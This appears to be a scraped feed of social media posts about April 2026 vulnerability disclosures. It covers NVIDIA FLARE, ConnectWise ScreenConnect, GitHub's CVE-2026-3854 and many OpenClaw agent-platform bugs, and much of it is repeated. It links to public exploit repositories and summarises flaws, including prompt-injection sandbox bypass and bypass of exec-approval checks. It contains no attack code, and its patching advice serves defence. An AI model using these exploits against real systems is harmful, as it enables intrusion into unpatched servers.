"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T21:36:22
2 posts
🟠 CVE-2026-24186 - High (8.8)
NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24186/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T21:36:22
1 posts
Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T21:36:21
2 posts
🔴 CVE-2026-24178 - Critical (9.8)
NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24178/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T21:34:00
8 posts
3 repos
https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE
https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit
Broadcom has a new advisory for a critical vulnerability:
ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---
Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---
From yesterday:
CISA added two vulnerabilities to the KEV catalogue:
- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202
- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708
- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec
##CISA Reports Active Exploitation of ConnectWise Flaw
CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.
**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/cisa-reports-active-exploitation-of-connectwise-flaw-x-k-o-s-c/gD2P6Ple2L
CISA Sounds Alarm Over Actively Exploited ConnectWise ScreenConnect Flaw, Immediate Patching Urged
Introduction The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning after confirming active exploitation of a serious vulnerability affecting ConnectWise ScreenConnect, one of the most widely used remote access and IT support platforms in enterprise environments. The flaw, tracked as CVE-2024-1708, has now been officially added to…
##CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...
##Broadcom has a new advisory for a critical vulnerability:
ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---
Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---
From yesterday:
CISA added two vulnerabilities to the KEV catalogue:
- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202
- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708
- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec
##CISA Reports Active Exploitation of ConnectWise Flaw
CISA reports active exploitation of ConnectWise ScreenConnect (CVE-2024-1708) that allow for remote code execution and security mechanism bypasses. CISA is requiring patching by May 12, 2026.
**If you're using ConnectWise ScreenConnect, update to the latest patched version ASAP. Your ScreenConnect is being actively exploited to deploy ransomware. If you can't patch right away, restrict access to the ScreenConnect server to trusted networks only and monitor for any signs of unauthorized access or suspicious activity.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/cisa-reports-active-exploitation-of-connectwise-flaw-x-k-o-s-c/gD2P6Ple2L
🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708
⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202
##CVE ID: CVE-2024-1708
Vendor: ConnectWise
Product: ScreenConnect
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-1708
updated 2026-04-28T20:24:58.820000
2 posts
🛑 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7202). Public exploit available. Restrict remote access & disable WPS until patched! https://radar.offseq.com/threat/cve-2026-7202-os-command-injection-in-totolink-a80-9229772f #OffSeq #IoTSecurity #vulnerability #CVE20267202
##🔴 CVE-2026-7202 - Critical (9.8)
A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injec...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7202/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:24:20.377000
1 posts
🚨 CRITICAL OS command injection in Totolink A8000RU (7.1cu.643_b20200521) via setVpnAccountCfg lets remote attackers run arbitrary commands. No patch yet; restrict device access & monitor closely. CVE-2026-7240 https://radar.offseq.com/threat/cve-2026-7240-os-command-injection-in-totolink-a80-cd808cb1 #OffSeq #CVE20267240 #infosec
##updated 2026-04-28T20:23:20.703000
1 posts
🟠 CVE-2026-38651 - High (8.2)
Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-38651/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:22:38.260000
1 posts
🟠 CVE-2026-7279 - High (7.8)
AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7279/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:18:13.020000
1 posts
1 repos
🟠 CVE-2025-67223 - High (7.5)
The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67223/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:11:56.713000
1 posts
🟠 CVE-2026-20766 - High (8.8)
An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-20766/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:11:56.713000
1 posts
🟠 CVE-2026-40972 - High (7.5)
An attacker on the same network as the remote application may be able to utilize a timing attack to discover information about the remote secret. In extreme circumstances this could result in the attacker determining the secret and uploading chang...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40972/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:59.913000
1 posts
🟠 CVE-2026-7320 - High (7.5)
Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
1 posts
🔴 CVE-2026-3893 - Critical (9.4)
The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3893/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
1 posts
🟠 CVE-2026-41384 - High (7.8)
OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41384/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
1 posts
🟠 CVE-2026-41395 - High (7.5)
OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41395/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
1 posts
🟠 CVE-2026-41396 - High (7.8)
OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41396/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
1 posts
🟠 CVE-2026-42422 - High (8.8)
OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42422/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T20:10:23.367000
1 posts
🟠 CVE-2026-42432 - High (7.8)
OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42432/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T19:37:39.507000
42 posts
4 repos
https://github.com/5kr1pt/CVE-2026-3854
https://github.com/LACHHAB-Anas/Exploit_CVE-2026-3854
Uh… this seems bad https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- **Zed 1.0 release**: Zed editor reaches 1.0 milestone, marketed as an AI-native editor with multi-agent support (Claude, Codex, OpenCode).
- **GitHub controversies**: GitHub outages, RCE vulnerability (CVE-2026-3854), and projects migrating away (e.g., Ghostty, BookStack to Codeberg).
- **AI coding tools and incidents**: Claude Code deletes [1/2]
like GitHub Copilot and its shift to usage-based billing
2. **GitHub Issues and Alternatives**
- Frequent GitHub outages and reliability concerns
- Projects migrating from GitHub to alternatives like Codeberg and Radicle
- Security vulnerabilities (e.g., CVE-2026-3854) and criticism from developers
3. **Energy and Sustainability Innovations**
- Sodium-ion batteries becoming mainstream (CATL’s 60 GWh deal)
- Renewable energy advancements (solar, wind, and [2/4]
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server
GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.
**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/github-patches-critical-rce-vulnerability-in-github-com-and-github-enterprise-server-r-x-e-8-5/gD2P6Ple2L
With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance https://nvd.nist.gov/vuln/detail/CVE-2026-3854
##GitHub Emergency Patch Stops Critical RCE Flaw That Could Have Exposed Millions of Private Repositories
Introduction GitHub has quietly prevented what may have become one of the most dangerous software supply chain incidents in recent years. In early March 2026, the company patched a critical remote code execution vulnerability tracked as CVE-2026-3854, a flaw that researchers say could have given attackers access to millions of private repositories worldwide. The…
##"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
New Episode: SANS Stormcast Wednesday, April 29th, 2026: Odd Vercel Header Usage; GitHub Vuln Patches; MSFT RDP Notification Bug
Shownotes:
HTTP Requests with X-Vercel-Set-Bypass-Cookie Header
https://isc.sans.edu/diary/HTTP%20Requests%20with%20X-Vercel-Set-Bypass-Cookie%20Header/32930
GitHub Vulnerability CVE-2026-3854
https://www.wiz.io/blog/github-rce-vulnerability-cve-
AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans
Or Listen right here.
##Aside from the abysimal uptime Github currently presents, they -also- had one of the worst security incidents you can think of: An RCE via a simple “git push” with total loss of tenant isolation (via https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854).
If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.
##GitHub remote code execution vulnerability found (and patched). This writeup is good. It digs deep into the details.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Cette faille GitHub est exploitable par un simple Git Push (CVE-2026-3854) https://www.it-connect.fr/cette-faille-github-est-exploitable-par-un-simple-git-push-cve-2026-3854/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub
##Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- **AI coding tools and incidents**: Claude-powered AI agent deletes company database; GitHub Copilot switching to usage-based billing; GitHub RCE vulnerability (CVE-2026-3854).
- **GitHub and open-source migrations**: BookStack moves from GitHub to Codeberg; Ghostty and other projects leaving GitHub; Warp terminal open-sourced.
- **PostgreSQL [1/2]
Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #technologyAtKukei https://masto.kukei.eu/browse/technology category:
- **GitHub reliability and security issues**: Frequent outages, RCE vulnerabilities (CVE-2026-3854), and concerns over AI integration (Copilot pricing changes, usage-based billing).
- **AI controversies and corporate deals**: Anthropic’s partnerships (Blender, Adobe), Google’s Pentagon AI deal, OpenAI’s legal battles with Elon Musk, and AI’s role [1/3]
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. https://radar.offseq.com/threat/critical-github-vulnerability-exposed-millions-of--29b3abff #OffSeq #GitHub #Infosec
##Uh… this seems bad https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server
GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.
**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/github-patches-critical-rce-vulnerability-in-github-com-and-github-enterprise-server-r-x-e-8-5/gD2P6Ple2L
With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance https://nvd.nist.gov/vuln/detail/CVE-2026-3854
##"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Aside from the abysimal uptime Github currently presents, they -also- had one of the worst security incidents you can think of: An RCE via a simple “git push” with total loss of tenant isolation (via https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854).
If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.
##Cette faille GitHub est exploitable par un simple Git Push (CVE-2026-3854) https://www.it-connect.fr/cette-faille-github-est-exploitable-par-un-simple-git-push-cve-2026-3854/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. https://radar.offseq.com/threat/critical-github-vulnerability-exposed-millions-of--29b3abff #OffSeq #GitHub #Infosec
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
There should be a "but the service is never up to be exploited" reducer on the CVE score.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Question about the GitHub RCE:
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 says GHES patches were _released_ on 03/10.
https://github.blog/security/securing-the-git-push-pipeline-responding-to-a-critical-remote-code-execution-vulnerability/ says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".
So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?
##Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown https://lobste.rs/s/8fxgx7 #security #vibecoding
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Comments: https://news.ycombinator.com/item?id=47936479
@GossiTheDog Here's a non-Twitter link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##HAHAHAHAHHAHAHAHAHAHAH https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Wiz got RCE on the cloud version of Github.com and access to every customer environment.
To do this they just reversed the on prem version and found a simple vuln.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Read on HackerWorkspace: https://hackerworkspace.com/article/github-rce-vulnerability-cve-2026-3854-breakdown-wiz-blog
##🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated
GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec
##GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».
Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.
Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
##updated 2026-04-28T18:30:21
1 posts
🟠 CVE-2026-42431 - High (8.1)
OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42431/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:28:53
1 posts
🟠 CVE-2026-42426 - High (8.8)
OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42426/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:28:19
1 posts
🟠 CVE-2026-42423 - High (7.5)
OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42423/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:26:36
1 posts
🟠 CVE-2026-41914 - High (8.5)
OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41914/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:25:57
1 posts
🟠 CVE-2026-41912 - High (7.6)
OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41912/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:24:06
1 posts
🟠 CVE-2026-41405 - High (7.5)
OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41405/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:23:43
1 posts
🟠 CVE-2026-41404 - High (8.8)
OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41404/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:22:28
1 posts
🟠 CVE-2026-41399 - High (7.5)
OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41399/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:20:50
1 posts
🟠 CVE-2026-41394 - High (8.2)
OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41394/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:18:46
1 posts
🟠 CVE-2026-41387 - High (7.8)
OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41387/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T18:18:23
1 posts
🔴 CVE-2026-41386 - Critical (9.1)
